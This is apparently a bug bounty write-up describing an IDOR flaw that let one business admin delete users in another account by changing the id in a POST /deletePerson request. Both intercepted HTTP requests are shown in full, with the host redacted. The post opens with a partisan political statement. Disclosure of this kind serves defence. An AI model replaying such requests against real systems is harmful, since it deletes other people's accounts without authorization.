IDOR Vulnerability Allowed the Deletion of Any User from an Administrator Account.
.بِسْمِ اللَّهِ الرَّحْمَٰنِ الرَّحِيمِ، وَالصَّلَاةُ وَالسَّلَامُ عَلَىٰ رَسُولِ اللَّهِ
We Stand with Palestine and don’t recognize a country called Israel.
Hi everyone, I’m a web penetration tester, and a part-time bug bounty hunter on HackerOne and BugCrowd.
What’s IDOR?
IDOR (Insecure Direct Object Reference) is a type of access control vulnerability where an application exposes internal object references, such as database keys or file names, in the URL or request parameters. This flaw allows attackers to manipulate these references to access or modify data they shouldn’t have access to. IDOR is a common issue in web applications that can lead to unauthorized actions or data breaches.
Explanation
Since the bug is not yet resolved and it’s a private bug bounty program, I will refer to the platform as example.com. I have a program with a business registration function that creates an admin account, granting full administrator permissions when creating an account, allowing you to add users, groups, and policies. I decided to create two accounts: one for the attacker and one for the victim. I created a user in each account and filled out the required information: First Name, Last Name, Email, ID(optional), and Group.
After creating these users, I wanted to test if there were additional functions available for editing user information. I found two functions: update with the /updatePerson endpoint and delete with the /deletePerson endpoint. I attempted to delete a user by clicking Delete User, intercepted the request, and confirmed the user deletion. I discovered that the program uses a REST API with JSON format and includes the user id from the administrator’s attacker account.
POST /deletePerson HTTP/2
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://example.com/
Authorization: Bearer <jwt>
Content-Type: application/json
Content-Length: 51
Origin: https://example.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: corsSec-Fetch-Site: same-site
Te: trailers{
"id":1058716 //User ID from the administrator's attacker account
}I tried changing the ID to the user ID from the victim account that I had created.
POST /deletePerson HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://redacted.com/
Authorization: Bearer <jwt>
Content-Type: application/json
Content-Length: 51
Origin: https://redacted.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: corsSec-Fetch-Site: same-site
Te: trailers{
"id":1058718 //User ID from the administrator's victim account
}The user from the victim account was successfully deleted.
